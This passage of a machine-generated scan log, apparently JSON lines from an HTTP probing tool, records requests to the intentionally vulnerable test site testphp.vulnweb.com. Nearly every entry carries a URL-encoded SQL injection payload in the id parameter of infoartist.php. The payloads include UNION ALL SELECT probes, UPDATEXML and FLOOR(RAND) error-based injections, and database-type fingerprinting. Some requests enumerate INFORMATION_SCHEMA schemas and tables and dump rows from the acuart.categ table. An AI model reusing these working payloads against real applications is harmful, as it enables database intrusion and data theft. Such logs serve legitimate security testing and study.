16b786b71%29%2C2609%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=%28UPDATEXML%287014%2CCONCAT%280x2e%2C0x7176716271%2C%28SELECT%20%28ELT%287014%3D7014%2C1%29%29%29%2C0x716b786b71%29%2C2609%29%29\",\"time\":\"345.143996ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:49.410699439Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1189%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x734a526c535367537751%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1189%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x734a526c535367537751%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1189%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x734a526c535367537751%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"355.532953ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.017676373Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1484%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28AURORA_VERSION%28%29%20LIKE%200x25%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1484%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28AURORA_VERSION%28%29%20LIKE%200x25%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1484%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28AURORA_VERSION%28%29%20LIKE%200x25%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"353.657276ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.025577274Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1684\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1684\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1684\",\"time\":\"339.482707ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.027262619Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1632%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28QUARTER%28NULL%20XOR%20NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1632%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28QUARTER%28NULL%20XOR%20NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1632%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28QUARTER%28NULL%20XOR%20NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"342.719715ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":74,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.027699606Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1529%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%7C%7CCHAR%28120%29%7C%7CCHAR%28112%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28%24LISTLENGTH%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHAR%28113%29%7C%7CCHAR%28112%29%7C%7CCHAR%28107%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%2CNULL--%20phZX\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1529%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%7C%7CCHAR%28120%29%7C%7CCHAR%28112%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28%24LISTLENGTH%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHAR%28113%29%7C%7CCHAR%28112%29%7C%7CCHAR%28107%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%2CNULL--%20phZX\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1529%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%7C%7CCHAR%28120%29%7C%7CCHAR%28112%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28%24LISTLENGTH%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHAR%28113%29%7C%7CCHAR%28112%29%7C%7CCHAR%28107%29%7C%7CCHAR%28106%29%7C%7CCHAR%28113%29%2CNULL--%20phZX\",\"time\":\"353.139627ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.052009935Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1684%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x496a7264677253437654656972617966796b4549784a4949707a77647a6965684945477469776b79%2C0x71706b6a71%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1684%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x496a7264677253437654656972617966796b4549784a4949707a77647a6965684945477469776b79%2C0x71706b6a71%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1684%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x496a7264677253437654656972617966796b4549784a4949707a77647a6965684945477469776b79%2C0x71706b6a71%29--%20-\",\"time\":\"353.383423ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.065812736Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1861%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ctable_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x616375617274%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1861%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ctable_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x616375617274%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1861%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ctable_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20%280x616375617274%29--%20-\",\"time\":\"353.413974ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":8,\"lines\":2,\"status_code\":200,\"content_length\":160,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.074993504Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1954%20OR%201%20GROUP%20BY%20CONCAT%280x7178706a71%2C%28SELECT%20%28CASE%20WHEN%20%282875%3D2875%29%20THEN%201%20ELSE%200%20END%29%29%2C0x71706b6a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-1954%20OR%201%20GROUP%20BY%20CONCAT%280x7178706a71%2C%28SELECT%20%28CASE%20WHEN%20%282875%3D2875%29%20THEN%201%20ELSE%200%20END%29%29%2C0x71706b6a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-1954%20OR%201%20GROUP%20BY%20CONCAT%280x7178706a71%2C%28SELECT%20%28CASE%20WHEN%20%282875%3D2875%29%20THEN%201%20ELSE%200%20END%29%29%2C0x71706b6a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23\",\"time\":\"356.810497ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.08440688Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2059%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28CHOSUNG%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20VWtc\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2059%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28CHOSUNG%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20VWtc\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-2059%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28CHOSUNG%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20VWtc\",\"time\":\"355.583999ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.088616896Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2230%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7473796449414b6c756166674d744b664e4951434f4a51674c554772615a635657536d584f796a59%2C0x71706b6a71%29%2C57--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2230%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7473796449414b6c756166674d744b664e4951434f4a51674c554772615a635657536d584f796a59%2C0x71706b6a71%29%2C57--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-2230%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7473796449414b6c756166674d744b664e4951434f4a51674c554772615a635657536d584f796a59%2C0x71706b6a71%29%2C57--%20-\",\"time\":\"353.248271ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:50.103446048Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2232%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28%7B%7D%20SUBSETEQ%20%28CAST%20%28%7B%7D%20AS%20SET%29%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20PnPW\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2232%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28%7B%7D%20SUBSETEQ%20%28CAST%20%28%7B%7D%20AS%20SET%29%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20PnPW\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-2232%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28%7B%7D%20SUBSETEQ%20%28CAST%20%28%7B%7D%20AS%20SET%29%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL--%20PnPW\",\"time\":\"353.314135ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:53.959039217Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2332%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Cschema_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2332%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Cschema_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-2332%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Cschema_name%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-\",\"time\":\"352.223638ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":105,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:53.972465605Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2418%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%26CHR%28120%29%26CHR%28112%29%26CHR%28106%29%26CHR%28113%29%26%28IIF%28VAL%28CVAR%281%29%29%3D1%2C1%2C0%29%29%26CHR%28113%29%26CHR%28112%29%26CHR%28107%29%26CHR%28106%29%26CHR%28113%29%2CNULL%20FROM%20MSysAccessObjects%16\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-2418%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%26CHR%28120%29%26CHR%28112%29%26CHR%28106%29%26CHR%28113%29%26%28IIF%28VAL%28CVAR%281%29%29%3D1%2C1%2C0%29%29%26CHR%28113%29%26CHR%28112%29%26CHR%28107%29%26CHR%28106%29%26CHR%28113%29%2CNULL%20FROM%20MSysAccessObjects%16\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-2418%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%26CHR%28120%29%26CHR%28112%29%26CHR%28106%29%26CHR%28113%29%26%28IIF%28VAL%28CVAR%281%29%29%3D1%2C1%2C0%29%29%26CHR%28113%29%26CHR%28112%29%26CHR%28107%29%26CHR%28106%29%26CHR%28113%29%2CNULL%20FROM%20MSysAccessObjects%16\",\"time\":\"343.319112ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:53.977301079Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-3642%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-3642%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-3642%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"340.093108ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":74,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:54.968324549Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-3875%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7744434c51726a566a66644f6c725861684c714b454f50765951736e724f674a684945436f727166%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-3875%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7744434c51726a566a66644f6c725861684c714b454f50765951736e724f674a684945436f727166%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-3875%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7744434c51726a566a66644f6c725861684c714b454f50765951736e724f674a684945436f727166%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"time\":\"346.875935ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":63,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:54.984594237Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-4923%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccat_id%2Ccdesc%2Ccname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.categ--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-4923%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccat_id%2Ccdesc%2Ccname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.categ--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-4923%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2CJSON_ARRAYAGG%28CONCAT_WS%280x6f78736b6273%2Ccat_id%2Ccdesc%2Ccname%29%29%2C0x71706b6a71%29%2CNULL%20FROM%20acuart.categ--%20-\",\"time\":\"356.483529ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":168,\"lines\":2,\"status_code\":200,\"content_length\":1205,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.138335898Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-5162%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284410%3D%28SELECT%204410%20FROM%20SYSIBM.SYSDUMMY1%29%29%20THEN%20CHR%2849%29%20ELSE%20CHR%2848%29%20END%29%20FROM%20SYSIBM.SYSDUMMY1%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL%20FROM%20SYSIBM.SYSDUMMY1--%20xECn\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-5162%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284410%3D%28SELECT%204410%20FROM%20SYSIBM.SYSDUMMY1%29%29%20THEN%20CHR%2849%29%20ELSE%20CHR%2848%29%20END%29%20FROM%20SYSIBM.SYSDUMMY1%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL%20FROM%20SYSIBM.SYSDUMMY1--%20xECn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=-5162%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284410%3D%28SELECT%204410%20FROM%20SYSIBM.SYSDUMMY1%29%29%20THEN%20CHR%2849%29%20ELSE%20CHR%2848%29%20END%29%20FROM%20SYSIBM.SYSDUMMY1%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%2CNULL%20FROM%20SYSIBM.SYSDUMMY1--%20xECn\",\"time\":\"347.590105ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:55.221559718Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-5361%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%2C120%2C112%2C106%2C113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28LAST_INSERT_ROWID%28%29%3DLAST_INSERT_ROWID%28%29%29%20THEN%201%20ELSE%200%20END%29%29%7C%7CCHAR%28113%2C112%2C107%2C106%2C113%29%2CNULL--%20DjIG\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=-5361%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%2C120%2C112%2C106%2C113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%28LAST_INSERT_ROWID%28%29%3DLAST_INSERT_ROWID%28%29%29%20THEN